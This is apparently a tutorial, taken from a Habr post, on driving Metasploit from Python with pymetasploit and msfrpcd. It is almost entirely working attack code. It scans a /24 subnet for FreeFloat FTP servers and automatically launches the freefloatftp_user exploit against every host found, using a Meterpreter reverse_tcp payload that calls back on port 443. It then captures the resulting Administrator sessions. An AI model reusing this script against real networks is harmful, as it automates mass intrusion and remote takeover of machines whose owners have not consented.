# Fetch pymetasploit and install it into the current Python environment.
repo_url='https://github.com/allfro/pymetasploit'
git clone "$repo_url"
cd pymetasploit
python setup.py install
root@kali-template:~# msfrpcd -h
Usage: msfrpcd <options>

OPTIONS:
    -P <opt>  Specify the password to access msfrpcd
    -S        Disable SSL on the RPC socket
    -U <opt>  Specify the username to access msfrpcd
    -a <opt>  Bind to this IP address
    -f        Run the daemon in the foreground
    -h        Help banner
    -n        Disable database
    -p <opt>  Bind to this port instead of 55553
    -t <opt>  Token Timeout (default 300 seconds)
    -u <opt>  URI for Web server

root@kali-template:~# msfrpcd -P password -n -f -a 127.0.0.1
[*] MSGRPC starting on 127.0.0.1:55553 (SSL):Msg...
[*] MSGRPC ready at 2018-03-28 14:34:10 +0300.
import re
import sys
import time

from metasploit.msfrpc import MsfRpcClient
from metasploit.msfconsole import MsfRpcConsole
# The RPC password has to match the -P value msfrpcd was started with.
rpc_password = 'password'
client = MsfRpcClient(rpc_password)
# read_console is the callback defined further down; it must already be
# bound when this statement runs.
console = MsfRpcConsole(client, cb=read_console)
In [6]: console.console.read()
Out[6]: {'busy': False, 'data': '', 'prompt': 'msf > '}
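# Module-level state shared with the console callback below.
# global_positive_out collects every console line that contains '[+]';
# global_console_status mirrors the 'busy' flag of the most recent callback.
# (The original wrapped these in module-level `global` statements, which are
# no-ops outside a function and are dropped here.)
global_positive_out = list()
global_console_status = False


def read_console(console_data):
    """Console callback: record the busy flag and collect '[+]' result lines.

    Args:
        console_data: dict with at least the keys 'busy' (bool) and 'data'
            (str), the shape console.read() returns.

    Side effects:
        Rebinds global_console_status to console_data['busy'], appends each
        line of console_data['data'] containing '[+]' to global_positive_out,
        and prints the busy flag and the raw data to stdout.

    Returns:
        None.
    """
    global global_console_status
    global_console_status = console_data['busy']
    # Parenthesised single-argument print is valid in both Python 2 and 3;
    # the original `print x` statement only parsed under Python 2.
    print(global_console_status)
    data = console_data['data']
    if '[+]' in data:
        for line in data.rstrip().split('\n'):
            if '[+]' in line:
                # append() mutates the shared list in place; no rebinding,
                # so no `global` declaration is needed for it.
                global_positive_out.append(line)
    print(data)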
# Drive the console with a fixed batch of commands, then give the callback a
# moment to report the busy flag before it is polled below.
scanner_commands = (
    'use auxiliary/scanner/ftp/ftp_version',
    'set RHOSTS 192.168.0.0/24',
    'set THREADS 20',
    'run',
)
for command in scanner_commands:
    console.execute(command)
time.sleep(5)
# Block until the console callback reports it is no longer busy.
# NOTE(review): this wait has no upper bound; compare_sessions() further down
# uses a deadline and this loop could adopt the same pattern.
poll_seconds = 5
while global_console_status:
    time.sleep(poll_seconds)
# Pull the first dotted-quad out of every collected '[+]' line that mentions
# FreeFloat.  NOTE(review): indexing [0] raises IndexError if such a line
# carries no dotted-quad at all.
ipv4_pattern = re.compile(r'[0-9]+(?:\.[0-9]+){3}')
freefloat_lines = [line for line in global_positive_out if 'FreeFloat' in line]
targets = [ipv4_pattern.findall(line)[0] for line in freefloat_lines]
In [4]: exploit.required
Out[4]: ['RHOST', 'SSLVersion', 'ConnectTimeout', 'FTPTimeout', 'RPORT']

In [5]: exploit.options
Out[5]: ['FTPDEBUG', 'ContextInformationFile', 'WORKSPACE', 'FTPPASS', 'FTPUSER', 'CHOST', 'RHOST', 'Proxies', 'DisablePayloadHandler', 'TCP::send_delay', 'SSLVersion', 'ConnectTimeout', 'CPORT', 'SSLVerifyMode', 'FTPTimeout', 'VERBOSE', 'SSLCipher', 'SSL', 'WfsDelay', 'TCP::max_send_size', 'EnableContextEncoding', 'RPORT']

exploit = client.modules.use('exploit', 'windows/ftp/freefloatftp_user')
pl = client.modules.use('payload', 'windows/meterpreter/reverse_tcp')
pl['LPORT'] = 443
pl['LHOST'] = localhost
pl['EXITFUNC'] = 'thread'
# Launch the configured module once per collected host.  Each iteration
# rebinds ftpsession, so only the last job dict survives the loop.
launch_pause = 5
for target in targets:
    exploit['RHOST'] = target
    ftpsession = exploit.execute(payload=pl)
    time.sleep(launch_pause)
{'job_id': 1, 'uuid': 'uv0ontph'}
{1: {'info': 'SEMYON-FE434C23\\Administrator @ SEMYON-FE434C23', 'username': 'root', 'session_port': 21, 'via_payload': 'payload/windows/meterpreter/reverse_tcp', 'uuid': 'azxxoup4', 'tunnel_local': '192.168.0.92:443', 'via_exploit': 'exploit/windows/ftp/freefloatftp_user', 'arch': 'x86', 'exploit_uuid': 'uv0ontph', 'tunnel_peer': '192.168.0.90:4418', 'platform': 'windows', 'workspace': 'false', 'routes': '', 'target_host': '192.168.0.90', 'type': 'meterpreter', 'session_host': '192.168.0.90', 'desc': 'Meterpreter'}}
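def get_session(sessions_list, exploit_job):
    """Return the id of the session created by exploit_job, or False.

    Args:
        sessions_list: mapping of session id -> session info dict, as returned
            by client.sessions.list; each info dict carries 'exploit_uuid'.
        exploit_job: dict returned by exploit.execute(); its 'uuid' is matched
            against the sessions' 'exploit_uuid'.

    Returns:
        The matching session id, or False when sessions_list is empty/None or
        no session belongs to that job.
    """
    if not sessions_list:
        return False
    wanted_uuid = exploit_job['uuid']
    for session_id, info in sessions_list.items():
        if info['exploit_uuid'] == wanted_uuid:
            return session_id
    return False


def compare_sessions(old_sessions_list, seconds=120):
    """Wait up to `seconds` for the session list to change and return the new entries.

    Polls client.sessions.list once per second (module-level `client`).

    Args:
        old_sessions_list: snapshot of client.sessions.list taken before the
            module was launched.
        seconds: maximum number of one-second polls before giving up.

    Returns:
        dict of the sessions whose ids are not in old_sessions_list, or False
        if the list did not change within the deadline.
    """
    remaining = seconds
    while client.sessions.list == old_sessions_list:
        if remaining == 0:
            return False
        time.sleep(1)
        remaining -= 1
    # Build a fresh dict rather than popping old ids in place: the original
    # `all(map(current_sessions.pop, old_sessions_list))` stops early on a
    # falsy value under Python 3's lazy map, raises KeyError if an old
    # session has since gone away, and mutates whatever client.sessions.list
    # handed back.
    current_sessions = client.sessions.list
    return {sid: info for sid, info in current_sessions.items()
            if sid not in old_sessions_list}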
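# Snapshot the session list before launching, for use with compare_sessions().
old_sessions = client.sessions.list
ftpsession = exploit.execute(payload=pl)
# Give the handler a moment to register a session before looking for it.
time.sleep(5)
ftpsessioncode = get_session(client.sessions.list, ftpsession)
if not ftpsessioncode:
    # Exit non-zero with a diagnostic on stderr; the original bare sys.exit()
    # returned status 0, which hides the failure from whatever ran the script.
    sys.exit('no session found for job %r' % (ftpsession,))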
# Attach to the session id found above and issue one read() on it.
shell = client.sessions.session(ftpsessioncode)
first_read = shell.read()
Source: https://habr.com/ru/post/353642/